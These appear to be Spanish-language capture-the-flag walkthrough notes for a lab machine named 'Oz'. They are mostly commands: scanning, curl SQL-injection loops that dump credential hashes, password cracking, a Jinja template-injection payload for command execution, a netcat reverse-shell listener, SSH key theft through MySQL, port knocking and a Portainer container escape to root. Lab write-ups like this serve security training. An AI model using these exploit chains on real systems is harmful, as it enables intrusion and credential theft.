nmap -A -p- -oA oz 10.129.29.198 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA oz 10.129.29.198
nmap -sU -O -p- -oA oz-udp 10.129.29.198
nikto -h 10.129.29.198:80
whatweb http://10.129.29.198
whatweb http://10.129.29.198:8080
Nos dirigimos a http://10.129.29.198
Nos dirigimos a http://10.129.29.198:8080
Vemos http://10.129.29.198/robots.txt
Vamos a http://10.129.29.198/users/admin
curl -s -X GET "http://10.129.29.198/users/%20union%20select%20version()--%20-"
clear; for i in $(seq 0 10); do echo "[+] Table [$i]ozdb]: $(curl -s -X GET http://10.129.29.198/users/%20union%20select%20table_name%20from%20information_schema.tables%20where%20table_schema-\"ozdb\"%20limit%20$i,1--%20-" | jq '.["username"]':)";done
clear; for i in $(seq 0 10); do echo "[+] column [$i]ozdb][users_gbw]: $(curl -s -X GET http://10.129.29.198/users/%20union%20select%20column_name%20from%20information_schema.columns%20where%20table_schema-\"ozdb\"%20limit%20$i,1--%20-" | jq '.["username"]':)";done
clear; for i in $(seq 0 10); do echo "[+] credentials [$i]ozdb]: $(curl -s -X GET http://10.129.29.198/users/%20union%20select%20group_contact(username,0x3a,password)%20from%20ozdb.users_gbw%20limit%20$i,1--%20-" | jq '.["username"]')";done
Metemos y modificamos las credenciales. Creamos un archivo llamado data.
cat data | tr ',' '\n' > hashes
cat hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
hashcat --example-hashes | grep "PBKDF2-HMAC-SHA256" -C 2
Trate de usar hashcat y no me funciono.
hashcat -m 10900 hashes /us/share/wordlists/rockyou.txt
Credenciales-> wizard.oz:wizardofoz22
Nos logeamos en http://10.129.29.198:8080/login
Vemos un sistema de tiquetes.
Y vemos la parte https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-writing-an-evil-config-file
Agregamos esto en burpsuite.
{{ ''.class.mro[2].subclasses()40.write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
{{ config'RUNCMD' }}
Lo modificamos para que podamos hacer un reverse shell:
rlwrap nc -lvnp 443
Nos damos cuenta que estamos en un contenedor
cd /.secret
cat knockd.conf
Vemos las credenciales en start.sh
mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "show tables" mysql
mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select User,Password from user" mysql
mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select passwor('N0Pl4c3L1keH0me')" mysql
mysql -udorthi -pN0Pl4c3L1keH0me -h 10.100.10.4 -e "select load_file('home/dorthi/.ssh/id_rsa')" mysql
Copiamos y hacemos modificaciones al id_rsa.
cat id_rsa | sed 's/\\n/\n/g' | sponge id_rsa
/usr/share/john/ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Creamos un archivo credentials.txt con las credenciales que habiamos encontrado.
john --wordlist=credentials.txt hash
for port in 40809 50212 46969; do echo "test" | nc -u -w 1 10.129.29.198 $port; done; ssh -i id_rsa dorthi@10.129.29.198
nmap -p- --open -T5 -v -n 172.17.0.2
nmap -sCV -p9000 172.17.0.2
Hacemos un port forward
enter
~C
ssh>
prompt,-L 9000:172.17.0.2:9000
Seguimos las instrucciones:
http "http://localhost:9000/api/auth" Username="admin" Password="password"
http "http://localhost:9000/api/users/admin/init" Username="admin" Password="password"
http "http://localhost:9000/api/auth" Username="admin" Password="password"
Nos dirigimos al menu y creamos un contenedor nuevo con la configuracion adecuada.
Nos dirigimos a la pestana Volumes y hacemos la siguiente configuracion:
Le damos click a >_console
Escogemos /bin/sh y le damos click a connect
cd rootfs
cd root && cat root.txt